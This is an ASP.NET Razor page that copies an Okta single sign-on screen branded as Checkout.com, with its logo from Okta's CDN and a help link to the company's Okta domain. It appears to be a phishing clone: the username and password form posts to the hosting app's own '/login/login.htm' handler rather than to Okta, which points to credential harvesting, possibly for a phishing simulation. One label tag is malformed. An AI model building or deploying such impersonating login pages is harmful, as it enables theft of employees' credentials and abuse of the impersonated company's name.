@page
@model IndexModel
@{
    ViewData["Title"] = "Home page";
}
<div class="content">
    <style type="text/css">
        .noscript-msg {
            background-color: #fff;
            border-color: #ddd #ddd #d8d8d8;
            box-shadow: 0 2px 0 rgba(175, 175, 175, 0.12);
            text-align: center;
            width: 398px;
            min-width: 300px;
            margin: 200px auto;
            border-radius: 3px;
            border-width: 1px;
            border-style: solid;
        }

        .noscript-content {
            padding: 42px;
        }

            .noscript-content h2 {
                padding-bottom: 20px;
            }

            .noscript-content h1 {
                padding-bottom: 25px;
            }

            .noscript-content a {
                background: transparent;
                box-shadow: none;
                display: table-cell;
                vertical-align: middle;
                width: 314px;
                height: 50px;
                line-height: 36px;
                color: #fff;
                background: linear-gradient(#007dc1, #0073b2), #007dc1;
                border: 1px solid;
                border-color: #004b75;
                border-bottom-color: #00456a;
                box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
                -webkit-border-radius: 3px;
                border-radius: 3px;
            }

                .noscript-content a:hover {
                    background: #007dc1;
                    cursor: hand;
                    text-decoration: none;
                }
    </style>


    <noscript>
        <div id="noscript-msg" class="noscript-msg">
            <div class="noscript-content">
                <h2>Javascript is required</h2>
                <h1>Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.</h1>
                <a href=".">Refresh</a>
            </div>
        </div>
    </noscript>


    <div id="signin-container">
        <div data-se="auth-container" id="okta-sign-in" class="auth-container main-container can-remove-beacon">
            <div class="okta-sign-in-header auth-header">
                <img src="https://ok7static.oktacdn.com/fs/bco/1/fs0k214ljlmt019gI356" class="auth-org-logo" alt="Checkout.com logo">
                <div data-type="beacon-container" class="beacon-container" style="transform: scale(1, 1); text-indent: 1px;">
                    <div class="js-security-beacon">
                        <div class="beacon-blank">
                            <div class="radial-progress-bar">
                                <div class="circle left"></div>
                                <div class="circle right"></div>
                            </div>
                        </div>
                        <div aria-live="polite" role="img" class="bg-helper auth-beacon auth-beacon-security undefined-user" data-se="security-beacon">
                            <span class="accessibility-text"></span>
                            <div class="okta-sign-in-beacon-border js-auth-beacon-border">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="auth-content">
                <div class="auth-content-inner">
                    <div class="primary-auth">
                        <form novalidate="novalidate" method="POST" action="/login/login.htm" data-se="o-form" slot="content" id="form1" class="primary-auth-form o-form o-form-edit-mode">
                            <div data-se="o-form-content" class="o-form-content o-form-theme clearfix">
                                <h2 data-se="o-form-head" class="okta-form-title o-form-head">Sign In</h2>
                                <div class="o-form-error-container" data-se="o-form-error-container"></div>
                                <div class="o-form-fieldset-container" data-se="o-form-fieldset-container">
                                    <div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-5">
                                        <div data-se="o-form-label" class="okta-form-label o-form-label">
                                            label for="okta-signin-username">Username&nbsp;
                                            </label>
                                        </div>
                                        <div data-se="o-form-input-container" class="o-form-input">
                                            <span data-se="o-form-input-username" class="o-form-input-name-username o-form-control okta-form-input-field input-fix">
                                                <input type="text" placeholder="" name="username" id="okta-signin-username" value="" aria-label="" autocomplete="off" required="">
                                            </span>
                                        </div>
                                    </div>
                                    <div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-30">
                                        <div data-se="o-form-label" class="okta-form-label o-form-label">
                                            <label for="okta-signin-password">Password&nbsp;</label>
                                        </div>
                                        <div data-se="o-form-input-container" class="o-form-input">
                                            <span data-se="o-form-input-password" class="o-form-input-name-password o-form-control okta-form-input-field input-fix">
                                                <input type="password" placeholder="" name="password" id="okta-signin-password" value="" aria-label="" autocomplete="off" required="">
                                            </span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="o-form-button-bar">
                                <input class="button button-primary" type="submit" value="Sign In" id="okta-signin-submit" data-type="save">
                            </div>
                        </form><div class="auth-footer">
                            <a href="#" data-se="needhelp" aria-expanded="false" aria-controls="help-links-container" class="link help js-help">
                                Need help signing in?
                            </a>
                            <ul class="help-links js-help-links" id="help-links-container" style="display: none;">
                                <li>
                                    <a href="#" data-se="forgot-password" class="link js-forgot-password">
                                        Forgot password?

                                    </a>
                                </li>

                                <li>
                                    <a href="https://checkout.okta.com/help/login" data-se="help-link" class="link js-help-link" rel="noopener noreferrer" target="_blank">
                                        Help
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

</div>

</div>